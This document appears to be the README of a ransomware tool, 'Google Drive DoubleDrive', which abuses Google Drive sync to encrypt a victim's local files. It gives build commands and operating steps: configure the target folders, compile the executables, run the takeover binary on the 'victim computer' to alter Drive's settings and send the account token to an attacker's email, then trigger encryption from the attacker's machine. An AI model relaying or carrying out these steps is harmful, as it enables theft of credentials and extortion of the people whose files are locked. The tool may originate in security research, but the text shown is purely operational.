
Google Drive DoubleDrive

A DoubleDrive variant that uses Google Drive to encrypt local files remotely.

How to use

1. Make sure you clone the DoubleDrive repo and install the DoubleDrive Python package. If you are currently in the google_drive_doubledrive folder, run:

   ```
   pip install ../
   ```

2. Use config_setup.py to set up the exact configuration you want for the ransomware. For example:

   ```
   python .\config_setup.py --temp-email --target-paths C:\Users\Admin\Documents C:\Users\Admin\Desktop
   ```

3. While you are in the google_drive_doubledrive folder, run:

   ```
   pyinstaller --onefile --add-data "config.yaml;." .\endpoint_takeover.py; pyinstaller --onefile --add-data "config.yaml;." .\google_drive_doubledrive.py
   ```

4. A folder named dist will be created. Inside it you can find endpoint_takeover.exe and google_drive_doubledrive.exe.

5. Transfer endpoint_takeover.exe to the victim computer and run it. This changes Google Drive's settings database so that the target paths to encrypt are synced. It also extracts the token of the currently logged-in Google Drive account and exfiltrates it by sharing it with the email address chosen in the configuration setup stage.

   Note - If you chose a temporary email address, continue to the next step as soon as possible, because the temporary email address that DoubleDrive generates only works for a limited amount of time.

6. On the attacker's computer, execute:

   ```
   google_drive_doubledrive.exe
   ```